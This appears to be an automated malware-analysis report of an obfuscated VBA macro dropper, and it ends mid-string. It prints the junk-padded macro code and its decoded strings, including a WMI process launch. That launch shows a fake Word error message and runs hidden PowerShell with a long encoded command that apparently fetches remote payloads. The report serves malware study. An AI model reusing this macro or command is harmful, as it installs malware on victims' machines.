75	Open "F:\FjsdhD\AqrMDHJ\RrhsGh.utzPF" For Binary Access Read As # IgKEcDFq	Open
76	Open "O:\juvxiJER\okAYJCIY\JGRYR.uKbmHCRyH" For Binary Access Read As # IgKEcDFq	Open
77	Redim mbAfpsdI(1 To LOF(intGend) - 5)	LOF intGend
78	Get # IgKEcDFq, , mbAfpsdI
79	Get # IgKEcDFq, , mbAfpsdI
80	Get # IgKEcDFq, , mbAfpsdI
81	Close # IgKEcDFq
81	MowsUK:
83	Btq8kso8ps4ew80gk = Njcpw_phi02f0(Px1h3ufov74hylz)
84	Goto pwSExduL
85	Dim yVoQA() as Byte
86	Dim itkMEH as Integer
87	itkMEH = FreeFile	FreeFile
88	Open "F:\gqMAa\hIkBCIoDH\plQXC.MztsGVF" For Binary Access Read As # itkMEH	Open
89	Open "O:\ntNeiY\DmIxDvJb\rzyKG.zgDFq" For Binary Access Read As # itkMEH	Open
90	Redim yVoQA(1 To LOF(intGend) - 5)	LOF intGend
91	Get # itkMEH, , yVoQA
92	Get # itkMEH, , yVoQA
93	Get # itkMEH, , yVoQA
94	Close # itkMEH
94	pwSExduL:
96	Set Sh38p_k57qec10xw97 = CreateObject(Btq8kso8ps4ew80gk)	CreateObject("winmgmts:win32_process") executed
97	Goto CNtZFGE
98	Dim WZuyub() as Byte
99	Dim SKhtFjI as Integer
100	SKhtFjI = FreeFile	FreeFile
101	Open "F:\dNNXEFJ\acmbFAE\woxMJXHDE.TtPXl" For Binary Access Read As # SKhtFjI	Open
102	Open "O:\SmEZL\EulgpIBLC\aXBYFG.JSmAKD" For Binary Access Read As # SKhtFjI	Open
103	Redim WZuyub(1 To LOF(intGend) - 5)	LOF intGend
104	Get # SKhtFjI, , WZuyub
105	Get # SKhtFjI, , WZuyub
106	Get # SKhtFjI, , WZuyub
107	Close # SKhtFjI
107	CNtZFGE:
109	Tqlcro8xaox_83zo = Mid(mKbjhqs, (2 + 3), Len(mKbjhqs))	Mid Len("\x01 ]b2[s]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[s/]b2[sc]b2[s ]b2[sm]b2[ss]b2[sg]b2[s ]b2[s%]b2[su]b2[ss]b2[se]b2[sr]b2[sn]b2[sa]b2[sm]b2[se]b2[s%]b2[s ]b2[s/]b2[sv]b2[s ]b2[sW]b2[so]b2[sr]b2[sd]b2[s ]b2[se]b2[sx]b2[sp]b2[se]b2[sr]b2[si]b2[se]b2[sn]b2[sc]b2[se]b2[sd]b2[s ]b2[sa]b2[sn]b2[s ]b2[se]b2[sr]b2[sr]b2[so]b2[sr]b2[s ]b2[st]b2[sr]b2[sy]b2[si]b2[sn]b2[sg]b2[s ]b2[st]b2[so]b2[s ]b2[so]b2[sp]b2[se]b2[sn]b2[s ]b2[st]b2[sh]b2[se]b2[s ]b2[sf]b2[si]b2[sl]b2[se]b2[s.]b2[s ]b2[s&]b2[s ]b2[s ]b2[sP]b2[s^]b2[sO]b2[sw]b2[s^]b2[se]b2[sr]b2[s^]b2[ss]b2[sh]b2[se]b2[s^]b2[sL]b2[s^]b2[sL]b2[s ]b2[s-]b2[sw]b2[s ]b2[sh]b2[si]b2[sd]b2[sd]b2[se]b2[sn]b2[s ]b2[s-]b2[sE]b2[sN]b2[sC]b2[sO]b2[sD]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s IAA]b2[sgAH]b2[sMAZ]b2[sQB0]b2[sAC0]b2[sASQ]b2[sB0A]b2[sGUA]b2[sbQA]b2[sgAH]b2[sYAY]b2[sQBS]b2[sAGk]b2[sAYQ]b2[sBCA]b2[sEwA]b2[sRQA]b2[s6AD]b2[sMAd]b2[sgBD]b2[sACA]b2[sAIA]b2[sAoA]b2[sFsA]b2[sVAB]b2[s5AH]b2[sAAR]b2[sQBd]b2[sACg]b2[sAIg]b2[sB7A]b2[sDUA]b2[sfQB]b2[s7AD]b2[sAAf]b2[sQB7]b2[sADE]b2[sAfQ]b2[sB7A]b2[sDMA]b2[sfQB]b2[s7AD]b2[sIAf]b2[sQB7]b2[sADQ]b2[sAfQ]b2[sAiA]b2[sCAA]b2[sLQB]b2[sGAC]b2[scAW]b2[sQBT]b2[sAHQ]b2[sAJw]b2[sAsA]b2[sCcA]b2[sRQB]b2[stAC]b2[s4AS]b2[sQBv]b2[sACc]b2[sALA]b2[sAnA]b2[sEkA]b2[sUgB]b2[sFAG]b2[sMAV]b2[sABP]b2[sACc]b2[sALA]b2[sAnA]b2[sC4A]b2[sZAA]b2[snAC]b2[swAJ]b2[swBS]b2[sAHk]b2[sAJw]b2[sAsA]b2[sCcA]b2[sUwA]b2[snAC]b2[skAI]b2[sAAg]b2[sACk]b2[sAOw]b2[sAgA]b2[sCAA]b2[sIAB]b2[sTAG]b2[sUAV]b2[sAAt]b2[sAEk]b2[sAVA]b2[sBFA]b2[sG0A]b2[sIAA]b2[sgAF]b2[sYAY]b2[sQBS]b2[sAGk]b2[sAQQ]b2[sBCA]b2[sGwA]b2[sRQA]b2[s6AD]b2[sUAN]b2[sAA5]b2[sAGM]b2[sAIA]b2[sAgA]b2[sCgA]b2[sIAA]b2[sgAF]b2[ssAd]b2[sABZ]b2[sAHA]b2[sAZQ]b2[sBdA]b2[sCgA]b2[sIgB]b2[s7AD]b2[sQAf]b2[sQB7]b2[sADE]b2[sAfQ]b2[sB7A]b2[sDAA]b2[sfQB]b2[s7AD]b2[sIAf]b2[sQB7]b2[sADM]b2[sAfQ]b2[sAiA]b2[sCAA]b2[sLQB]b2[sGAC]b2[sAAJ]b2[swAu]b2[sACc]b2[sALA]b2[sAnA]b2[sHkA]b2[scwB]b2[s0AE]b2[sUAb]b2[sQAn]b2[sACw]b2[sAJw]b2[sBOA]b2[sEUA]b2[sVAA]b2[suAF]b2[sMAR]b2[sQBy]b2[sAHY]b2[sAaQ]b2[sBjA]b2[sGUA]b2[sUAB]b2[sPAG]b2[skAb]b2[sgAn]b2[sACw]b2[sAJw]b2[sBUA]b2[sG0A]b2[sQQB]b2[suAE]b2[sEAZ]b2[swBF]b2[sAFI]b2[sAJw]b2[sAsA]b2[sCcA]b2[sUwA]b2[snAC]b2[skAI]b2[sAAp]b2[sACA]b2[sAOw]b2[sAgA]b2[sCAA]b2[sJAB]b2[sFAH]b2[sIAc]b2[sgBv]b2[sAHI]b2[sAQQ]b2[sBjA]b2[sHQA]b2[saQB]b2[svAG]b2[s4AU]b2[sABy]b2[sAGU]b2[sAZg]b2[sBlA]b2[sHIA]b2[sZQB]b2[suAG]b2[sMAZ]b2[sQAg]b2[sAD0]b2[sAIA]b2[sAoA]b2[sCcA]b2[sUwA]b2[snAC]b2[ssAK]b2[sAAn]b2[sAGk]b2[sAbA]b2[sBlA]b2[sCcA]b2[sKwA]b2[snAG]b2[s4AJ]b2[swAr]b2[sACc]b2[sAdA]b2[sBsA]b2[sHkA]b2[sJwA]b2[spAC]b2[ssAK]b2[sAAn]b2[sAEM]b2[sAbw]b2[sAnA]b2[sCsA]b2[sJwB]b2[suAC]b2[scAK]b2[sQAr]b2[sACg]b2[sAJw]b2[sB0A]b2[sCcA]b2[sKwA]b2[snAG]b2[skAb]b2[sgB1]b2[sACc]b2[sAKQ]b2[sArA]b2[sCcA]b2[sZQA]b2[snAC]b2[skAO]b2[swAk]b2[sAEE]b2[sAOA]b2[sBoA]b2[sDIA]b2[scgB]b2[s6AG]b2[sIAP]b2[sQAk]b2[sAEY]b2[sANg]b2[sBfA]b2[sEEA]b2[sIAA]b2[srAC]b2[sAAW]b2[swBj]b2[sAGg]b2[sAYQ]b2[sByA]b2[sF0A]b2[sKAA]b2[s2AD]b2[sQAK]b2[sQAg]b2[sACs]b2[sAIA]b2[sAkA]b2[sEwA]b2[sOQA]b2[s4AF]b2[sAAO]b2[swAk]b2[sAE0]b2[sAMA]b2[sAwA]b2[sE8A]b2[sPQA]b2[soAC]b2[scAQ]b2[swAn]b2[sACs]b2[sAKA]b2[sAnA]b2[sDgA]b2[sMgA]b2[snAC]b2[ssAJ]b2[swBa]b2[sACc]b2[sAKQ]b2[sApA]b2[sDsA]b2[sIAA]b2[skAD]b2[sMAV]b2[sgBD]b2[sADo]b2[sAOg]b2[sAiA]b2[sGMA]b2[scgB]b2[slAG]b2[sEAY]b2[sABU]b2[sAGA]b2[sARQ]b2[sBgA]b2[sEQA]b2[sYAB]b2[spAF]b2[sIAZ]b2[sQBj]b2[sAFQ]b2[sAbw]b2[sBSA]b2[sHkA]b2[sIgA]b2[soAC]b2[sQAS]b2[sABP]b2[sAE0]b2[sARQ]b2[sAgA]b2[sCsA]b2[sIAA]b2[soAC]b2[sgAK]b2[sAAn]b2[sAFQ]b2[sAeQ]b2[sBWA]b2[sCcA]b2[sKwA]b2[snAF]b2[sgAd]b2[sAAn]b2[sACs]b2[sAJw]b2[sBzA]b2[sF8A]b2[sbgA]b2[snAC]b2[skAK]b2[swAo]b2[sACc]b2[sAbQ]b2[sBmA]b2[sFQA]b2[seQB]b2[sWAF]b2[sAAN]b2[sAAn]b2[sACs]b2[sAJw]b2[sAxA]b2[sCcA]b2[sKQA]b2[srAC]b2[scAO]b2[sAA4]b2[sACc]b2[sAKw]b2[sAoA]b2[sCcA]b2[scQB]b2[srAC]b2[scAK]b2[swAn]b2[sAFQ]b2[sAJw]b2[sApA]b2[sCsA]b2[sJwB]b2[s5AF]b2[sYAJ]b2[swAp]b2[sACA]b2[sALQ]b2[sByA]b2[sEUA]b2[scAB]b2[ssAG]b2[sEAQ]b2[swBF]b2[sACA]b2[sAIA]b2[sAoA]b2[sCcA]b2[sVAA]b2[snAC]b2[ssAJ]b2[swB5]b2[sAFY]b2[sAJw]b2) -> 15492 executed
110	Goto zJHKYzJ
111	Dim KGneUHDB() as Byte
112	Dim yrkIKRGIk as Integer
113	yrkIKRGIk = FreeFile	FreeFile
114	Open "F:\jAZCT\DySvBJIFG\hAlfC.fnSKCJJG" For Binary Access Read As # yrkIKRGIk	Open
115	Open "O:\qSjvl\yUGgtdAWG\oVioFFBy.quDugF" For Binary Access Read As # yrkIKRGIk	Open
116	Redim KGneUHDB(1 To LOF(intGend) - 5)	LOF intGend
117	Get # yrkIKRGIk, , KGneUHDB
118	Get # yrkIKRGIk, , KGneUHDB
119	Get # yrkIKRGIk, , KGneUHDB
120	Close # yrkIKRGIk
120	zJHKYzJ:
122	Goto vKyPeD
123	Dim igkzHsOD() as Byte
124	Dim fLfZBI as Integer
125	fLfZBI = FreeFile	FreeFile
126	Open "F:\hGyrGI\qHGrBJsd\hZWkGjB.TBolF" For Binary Access Read As # fLfZBI	Open
127	Open "O:\FbzvAFHGg\ZHHZEbi\hGbdjB.VomiwAsk" For Binary Access Read As # fLfZBI	Open
128	Redim igkzHsOD(1 To LOF(intGend) - 5)	LOF intGend
129	Get # fLfZBI, , igkzHsOD
130	Get # fLfZBI, , igkzHsOD
131	Get # fLfZBI, , igkzHsOD
132	Close # fLfZBI
132	vKyPeD:
134	Sh38p_k57qec10xw97.Create Njcpw_phi02f0(Tqlcro8xaox_83zo), Ykqhx9otvrqd8hk, K6e5kz9g40vnyyqph	SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMAZQB0AC0ASQB0AGUAbQAgAHYAYQBSAGkAYQBCAEwARQA6ADMAdgBDACAAIAAoAFsAVAB5AHAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADEAfQB7ADMAfQB7ADIAfQB7ADQAfQAiACAALQBGACcAWQBTAHQAJwAsACcARQBtAC4ASQBvACcALAAnAEkAUgBFAGMAVABPACcALAAnAC4AZAAnACwAJwBSAHkAJwAsACcAUwAnACkAIAAgACkAOwAgACAAIABTAGUAVAAtAEkAVABFAG0AIAAgAFYAYQBSAGkAQQBCAGwARQA6ADUANAA5AGMAIAAgACgAIAAgAFsAdABZAHAAZQBdACgAIgB7ADQAfQB7ADEAfQB7ADAAfQB7ADIAfQB7ADMAfQAiACAALQBGACAAJwAuACcALAAnAHkAcwB0AEUAbQAnACwAJwBOAEUAVAAuAFMARQByAHYAaQBjAGUAUABPAGkAbgAnACwAJwBUAG0AQQBuAEEAZwBFAFIAJwAsACcAUwAnACkAIAApACAAOwAgACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwAnACsAKAAnAGkAbABlACcAKwAnAG4AJwArACcAdABsAHkAJwApACsAKAAnAEMAbwAnACsAJwBuACcAKQArACgAJwB0ACcAKwAnAGkAbgB1ACcAKQArACcAZQAnACkAOwAkAEEAOABoADIAcgB6AGIAPQAkAEYANgBfAEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEwAOQA4AFAAOwAkAE0AMAAwAE8APQAoACcAQwAnACsAKAAnADgAMgAnACsAJwBaACcAKQApADsAIAAkADMAVgBDADoAOgAiAGMAcgBlAGEAYABUAGAARQBgAEQAYABpAFIAZQBjAFQAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAFQAeQBWACcAKwAnAFgAdAAnACsAJwBzAF8AbgAnACkAKwAoACcAbQBmAFQAeQBWAFAANAAnACsAJwAxACcAKQArACcAOAA4ACcAKwAoACcAcQBrACcAKwAnAFQAJwApACsAJwB5AFYAJwApACAALQByAEUAcABsAGEAQwBFACAAIAAoACcAVAAnACsAJwB5AFYAJwApACwAWwBDAEgAYQByAF0AOQAyACkAKQA7ACQAQwA0ADIATgA9ACgAKAAnAEMAJwArACcAMQAzACcAKQArACcARAAnACkAOwAgACAAKAAgAGwAUwAgACAAVgBBAFIAaQBBAGIATABlADoANQA0ADkAQwAgACkALgB2AGEATAB1AEUAOgA6ACIAcwBFAGMAVQBgAFIAYABpAFQAeQBwAFIAbwB0AGAAbwBgAGMATwBsACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABEADcANwBZAD0AKAAnAFoAOAAnACsAJwBfAFYAJwApADsAJABXAHYANgB4AGIANQA3ACAAPQAgACgAKAAnAFUAOQAnACsAJwA1ACcAKQArACcARAAnACkAOwAkAEgAMAAxAFYAPQAoACgAJwBHADkAJwArACcANgAnACkAKwAnAEgAJwApADsAJABUAHoAbwA3AHQAdwBsAD0AJABIAE8ATQBFACsAKAAoACcASgBqACcAKwAnAFcAJwArACgAJwBYAHQAJwArACcAcwBfAG4AbQAnACsAJwBmAEoAagBXAFAANAAnACsAJwAxADgAJwApACsAJwA4ACcAKwAoACcAcQAnACsAJwBrAEoAJwApACsAJwBqACcAKwAnAFcAJwApAC0AYwBSAGUAUABsAGEAQwBFACAAKAAnAEoAagAnACsAJwBXACcAKQAsAFsAQwBIAEEAUgBdADkAMgApACsAJABXAHYANgB4AGIANQA3ACsAKAAnAC4AJwArACgAJwBkACcAKwAnAGwAbAAnACkAKQA7ACQAWAA1ADYAUAA9ACgAJwBMACcAKwAoACcANgA3ACcAKwAnAFEAJwApACkAOwAkAFcAdABfADUAdwBrAGMAPQAoACcAXQBiACcAKwAoACcAMgBbAHMAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvACcAKwAnAGYAbQBjAGEAJwApACsAJwB2AC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBpAG0AYQAnACsAJwBnAGUAcwAnACkAKwAnAC8ANwAnACsAKAAnAEYAVgA0AE4AJwArACcAZAAnACsAJwAvAEAAXQBiADIAWwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAdABoAGUAcAByACcAKwAnAGEAJwApACsAKAAnAGoAaQAnACsAJwBuACcAKQArACgAJwBzAGgAJwArACcAZQBlAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AbwB0ACcAKQArACgAJwBoACcAKwAnAGUAJwArACcAcgBmACcAKwAnAGkAbABlAHMAJwArACcALwB3AEEARgBQAC8AJwApACsAJwBAAF0AJwArACgAJwBiADIAWwBzADoAJwArACcALwAnACsAJwAvACcAKwAnAHcAdwB3AC4AcgBlAG0AbwB2ACcAKwAnAGUAcAAnACkAKwAoACcAYwB0AHIAJwArACcAbwAnACkAKwAnAGoAYQAnACsAKAAnAG4AJwArACcALgBjACcAKQArACgAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAKAAnAC0AJwArACcAYQBkAG0AJwApACsAJwBpAG4AJwArACcALwAnACsAKAAnAGEAawAnACsAJwAwACcAKQArACcAYwAnACsAJwBoACcAKwAoACcASAAnACsAJwAvAEAAJwArACcAXQBiADIAJwApACsAKAAnAFsAcwAnACsAJwA6ACcAKQArACgAJwAvAC8AdwAnACsAJwB3AHcALgAnACkAKwAnAGcAJwArACgAJwBlACcAKwAnAG8AcwByACcAKQArACcAdAAuACcAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYQBxAHEAJwArACcAaAAnACkAKwAoACcAdwAnACsAJwBkAGEAcAAnACkAKwAoACcALwBsACcAKwAnADAALwBAACcAKwAnAF0AYgAyAFsAcwA6ACcAKQArACcALwAvACcAKwAnAGcAZQAnACsAJwBvACcAKwAnAGYAJwArACcAZgAnACsAJwBvAGcAJwArACgAJwBsACcAKwAnAGUAbQB1AHMAaQAnACsAJwBjAC4AJwApACsAJwBjACcAKwAoACcAbwAnACsAJwBtAC8AdwBwACcAKQArACgAJwAtACcAKwAnAGEAZAAnACkAKwAoACcAbQBpACcAKwAnAG4ALwAnACkAKwAoACcANwAnACsAJwBDADEAJwApACsAJwAxACcAKwAoACcAbwAnACsAJwBBAEMALwBAACcAKQArACgAJwBdAGIAJwArACcAMgBbAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAdwB3ACcAKwAoACcAdwAnACsAJwAuAGEAYwBoAHUAdABhACcAKwAnAG0AJwArACcAYQBuACcAKQArACcAYQBzACcAKwAoACcAYQAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAnACsAJwAvAGcAJwApACsAJwBhAHIAJwArACcAbQBpACcAKwAnAG4AJwArACcALQAnACsAKAAnAHAAJwArACcAcgBvAC0AZgAnACkAKwAoACcAZQAnACsAJwBpADgAbwAvACcAKQArACgAJwBtAFcAJwArACcALwAnACkAKwA,,) -> 0 Ykqhx9otvrqd8hk K6e5kz9g40vnyyqph executed
135	Goto aIQdBCWAF
136	Dim VRkXRq() as Byte
137	Dim AZymJ as Integer
138	AZymJ = FreeFile	FreeFile
139	Open "F:\SUBaGhI\zSrEaFB\FspCHJf.SAqAGV" For Binary Access Read As # AZymJ	Open
140	Open "O:\ndcDJ\EmuLtI\DzqYCH.rPICspJ" For Binary Access Read As # AZymJ	Open
141	Redim VRkXRq(1 To LOF(intGend) - 5)	LOF intGend
142	Get # AZymJ, , VRkXRq
143	Get # AZymJ, , VRkXRq
144	Get # AZymJ, , VRkXRq
145	Close # AZymJ
145	aIQdBCWAF:
147	Goto rvCQBGwH
148	Dim SlnFEwSdl() as Byte
149	Dim uqnnDLEb as Integer
150	uqnnDLEb = FreeFile	FreeFile
151	Open "F:\OanxNh\dmwfIytAI\zSVYCAEwA.eRhegND" For Binary Access Read As # uqnnDLEb	Open
152	Open "O:\GihTHDyJ\xMEpEDFW\QjvPEbIGE.jZthRA" For Binary Access Read As # uqnnDLEb	Open
153	Redim SlnFEwSdl(1 To LOF(intGend) - 5)	LOF intGend
154	Get # uqnnDLEb, , SlnFEwSdl
155	Get # uqnnDLEb, , SlnFEwSdl
156	Get # uqnnDLEb, , SlnFEwSdl
157	Close # uqnnDLEb
157	rvCQBGwH:
159	End Function

Function Njcpw_phi02f0, APIs: 33, Strings: 8, Number of lines: 54, Relevance: 61.554

APIs	Meta Information
FreeFile
Open
Open
LOF
intGend
FreeFile
Open
Open
LOF
intGend
Part of subcall function Syv_ghviw_8l22@Ifll4vsaspsrsln6_: Zzf8ou_itu4vukq
Part of subcall function Syv_ghviw_8l22@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Syv_ghviw_8l22@Ifll4vsaspsrsln6_: Open
Part of subcall function Syv_ghviw_8l22@Ifll4vsaspsrsln6_: Open
Part of subcall function Syv_ghviw_8l22@Ifll4vsaspsrsln6_: LOF
Part of subcall function Syv_ghviw_8l22@Ifll4vsaspsrsln6_: intGend
Part of subcall function Syv_ghviw_8l22@Ifll4vsaspsrsln6_: Replace
Part of subcall function Syv_ghviw_8l22@Ifll4vsaspsrsln6_: Yll3shw1598y8rt_cn
Part of subcall function Syv_ghviw_8l22@Ifll4vsaspsrsln6_: FreeFile
Part of subcall function Syv_ghviw_8l22@Ifll4vsaspsrsln6_: Open
Part of subcall function Syv_ghviw_8l22@Ifll4vsaspsrsln6_: Open
Part of subcall function Syv_ghviw_8l22@Ifll4vsaspsrsln6_: LOF
Part of subcall function Syv_ghviw_8l22@Ifll4vsaspsrsln6_: intGend
FreeFile
Open
Open
LOF
intGend
FreeFile
Open
Open
LOF
intGend

Strings	Decrypted Strings
"F:\LaXzEEPVS\NELWEaJG\TvjLE.YwLcJF"
"O:\eutDC\eaAYCHl\GObSFCs.YOftniIh"
"F:\xJozuHdEN\ADlgItJx\YfYaiFhDE.kZcvDrGGq"
"O:\FNlPqdU\yMDerBjAI\HYROCHJJ.obdMDCd"
"F:\tLhtGJJqI\EDSME\OnHhcF.CjTGdBI"
"O:\SXlgB\DObjDDYJ\QnwLfF.xhiJBAa"
"F:\pqfpqwI\YzHAAE\adNkxHr.XKNlnB"
"O:\HEriW\OlyoIMJE\lhMoF.pEJsB"

Line	Instruction	Meta Information
160	Function Njcpw_phi02f0(Anhlci4u6mrgd9n5dx)
161	On Error Resume Next	executed
162	Goto LOSnJ
163	Dim tAUYHJKI() as Byte
164	Dim vKTLOEO as Integer
165	vKTLOEO = FreeFile	FreeFile
166	Open "F:\LaXzEEPVS\NELWEaJG\TvjLE.YwLcJF" For Binary Access Read As # vKTLOEO	Open
167	Open "O:\eutDC\eaAYCHl\GObSFCs.YOftniIh" For Binary Access Read As # vKTLOEO	Open
168	Redim tAUYHJKI(1 To LOF(intGend) - 5)	LOF intGend
169	Get # vKTLOEO, , tAUYHJKI
170	Get # vKTLOEO, , tAUYHJKI
171	Get # vKTLOEO, , tAUYHJKI
172	Close # vKTLOEO
172	LOSnJ:
174	Dzd5_3nk50q = (Anhlci4u6mrgd9n5dx)
175	Goto sgHzJ
176	Dim KmguP() as Byte
177	Dim wiMPPMQc as Integer
178	wiMPPMQc = FreeFile	FreeFile
179	Open "F:\xJozuHdEN\ADlgItJx\YfYaiFhDE.kZcvDrGGq" For Binary Access Read As # wiMPPMQc	Open
180	Open "O:\FNlPqdU\yMDerBjAI\HYROCHJJ.obdMDCd" For Binary Access Read As # wiMPPMQc	Open
181	Redim KmguP(1 To LOF(intGend) - 5)	LOF intGend
182	Get # wiMPPMQc, , KmguP
183	Get # wiMPPMQc, , KmguP
184	Get # wiMPPMQc, , KmguP
185	Close # wiMPPMQc
185	sgHzJ:
187	Lu4qlhfelm575 = Syv_ghviw_8l22(Dzd5_3nk50q)
188	Goto PwWkBCkb
189	Dim IcahCDE() as Byte
190	Dim ZuVZXFr as Integer
191	ZuVZXFr = FreeFile	FreeFile
192	Open "F:\tLhtGJJqI\EDSME\OnHhcF.CjTGdBI" For Binary Access Read As # ZuVZXFr	Open
193	Open "O:\SXlgB\DObjDDYJ\QnwLfF.xhiJBAa" For Binary Access Read As # ZuVZXFr	Open
194	Redim IcahCDE(1 To LOF(intGend) - 5)	LOF intGend
195	Get # ZuVZXFr, , IcahCDE
196	Get # ZuVZXFr, , IcahCDE
197	Get # ZuVZXFr, , IcahCDE
198	Close # ZuVZXFr
198	PwWkBCkb:
200	Njcpw_phi02f0 = Lu4qlhfelm575
201	Goto VRvXeA
202	Dim xIvSdpG() as Byte
203	Dim ylBklGy as Integer
204	ylBklGy = FreeFile	FreeFile
205	Open "F:\pqfpqwI\YzHAAE\adNkxHr.XKNlnB" For Binary Access Read As # ylBklGy	Open
206	Open "O:\HEriW\OlyoIMJE\lhMoF.pEJsB" For Binary Access Read As # ylBklGy	Open
207	Redim xIvSdpG(1 To LOF(intGend) - 5)	LOF intGend
208	Get # ylBklGy, , xIvSdpG
209	Get # ylBklGy, , xIvSdpG
210	Get # ylBklGy, , xIvSdpG
211	Close # ylBklGy
211	VRvXeA:
213	End Function

Function Syv_ghviw_8l22, APIs: 13, Strings: 5, Number of lines: 28, Relevance: 36.778

APIs	Meta Information
Zzf8ou_itu4vukq
FreeFile
Open
Open
LOF
intGend
Replace	Replace("w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s]b2[ss]b2[s]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s]b2[sp]b2[s]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s","]b2[s",) -> winmgmts:win32_process Replace("]b2[s]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[sc]b2[sm]b2[sd]b2[s ]b2[s/]b2[sc]b2[s ]b2[sm]b2[ss]b2[sg]b2[s ]b2[s%]b2[su]b2[ss]b2[se]b2[sr]b2[sn]b2[sa]b2[sm]b2[se]b2[s%]b2[s ]b2[s/]b2[sv]b2[s ]b2[sW]b2[so]b2[sr]b2[sd]b2[s ]b2[se]b2[sx]b2[sp]b2[se]b2[sr]b2[si]b2[se]b2[sn]b2[sc]b2[se]b2[sd]b2[s ]b2[sa]b2[sn]b2[s ]b2[se]b2[sr]b2[sr]b2[so]b2[sr]b2[s ]b2[st]b2[sr]b2[sy]b2[si]b2[sn]b2[sg]b2[s ]b2[st]b2[so]b2[s ]b2[so]b2[sp]b2[se]b2[sn]b2[s ]b2[st]b2[sh]b2[se]b2[s ]b2[sf]b2[si]b2[sl]b2[se]b2[s.]b2[s ]b2[s&]b2[s ]b2[s ]b2[sP]b2[s^]b2[sO]b2[sw]b2[s^]b2[se]b2[sr]b2[s^]b2[ss]b2[sh]b2[se]b2[s^]b2[sL]b2[s^]b2[sL]b2[s ]b2[s-]b2[sw]b2[s ]b2[sh]b2[si]b2[sd]b2[sd]b2[se]b2[sn]b2[s ]b2[s-]b2[sE]b2[sN]b2[sC]b2[sO]b2[sD]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s ]b2[s IAA]b2[sgAH]b2[sMAZ]b2[sQB0]b2[sAC0]b2[sASQ]b2[sB0A]b2[sGUA]b2[sbQA]b2[sgAH]b2[sYAY]b2[sQBS]b2[sAGk]b2[sAYQ]b2[sBCA]b2[sEwA]b2[sRQA]b2[s6AD]b2[sMAd]b2[sgBD]b2[sACA]b2[sAIA]b2[sAoA]b2[sFsA]b2[sVAB]b2[s5AH]b2[sAAR]b2[sQBd]b2[sACg]b2[sAIg]b2[sB7A]b2[sDUA]b2[sfQB]b2[s7AD]b2[sAAf]b2[sQB7]b2[sADE]b2[sAfQ]b2[sB7A]b2[sDMA]b2[sfQB]b2[s7AD]b2[sIAf]b2[sQB7]b2[sADQ]b2[sAfQ]b2[sAiA]b2[sCAA]b2[sLQB]b2[sGAC]b2[scAW]b2[sQBT]b2[sAHQ]b2[sAJw]b2[sAsA]b2[sCcA]b2[sRQB]b2[stAC]b2[s4AS]b2[sQBv]b2[sACc]b2[sALA]b2[sAnA]b2[sEkA]b2[sUgB]b2[sFAG]b2[sMAV]b2[sABP]b2[sACc]b2[sALA]b2[sAnA]b2[sC4A]b2[sZAA]b2[snAC]b2[swAJ]b2[swBS]b2[sAHk]b2[sAJw]b2[sAsA]b2[sCcA]b2[sUwA]b2[snAC]b2[skAI]b2[sAAg]b2[sACk]b2[sAOw]b2[sAgA]b2[sCAA]b2[sIAB]b2[sTAG]b2[sUAV]b2[sAAt]b2[sAEk]b2[sAVA]b2[sBFA]b2[sG0A]b2[sIAA]b2[sgAF]b2[sYAY]b2[sQBS]b2[sAGk]b2[sAQQ]b2[sBCA]b2[sGwA]b2[sRQA]b2[s6AD]b2[sUAN]b2[sAA5]b2[sAGM]b2[sAIA]b2[sAgA]b2[sCgA]b2[sIAA]b2[sgAF]b2[ssAd]b2[sABZ]b2[sAHA]b2[sAZQ]b2[sBdA]b2[sCgA]b2[sIgB]b2[s7AD]b2[sQAf]b2[sQB7]b2[sADE]b2[sAfQ]b2[sB7A]b2[sDAA]b2[sfQB]b2[s7AD]b2[sIAf]b2[sQB7]b2[sADM]b2[sAfQ]b2[sAiA]b2[sCAA]b2[sLQB]b2[sGAC]b2[sAAJ]b2[swAu]b2[sACc]b2[sALA]b2[sAnA]b2[sHkA]b2[scwB]b2[s0AE]b2[sUAb]b2[sQAn]b2[sACw]b2[sAJw]b2[sBOA]b2[sEUA]b2[sVAA]b2[suAF]b2[sMAR]b2[sQBy]b2[sAHY]b2[sAaQ]b2[sBjA]b2[sGUA]b2[sUAB]b2[sPAG]b2[skAb]b2[sgAn]b2[sACw]b2[sAJw]b2[sBUA]b2[sG0A]b2[sQQB]b2[suAE]b2[sEAZ]b2[swBF]b2[sAFI]b2[sAJw]b2[sAsA]b2[sCcA]b2[sUwA]b2[snAC]b2[skAI]b2[sAAp]b2[sACA]b2[sAOw]b2[sAgA]b2[sCAA]b2[sJAB]b2[sFAH]b2[sIAc]b2[sgBv]b2[sAHI]b2[sAQQ]b2[sBjA]b2[sH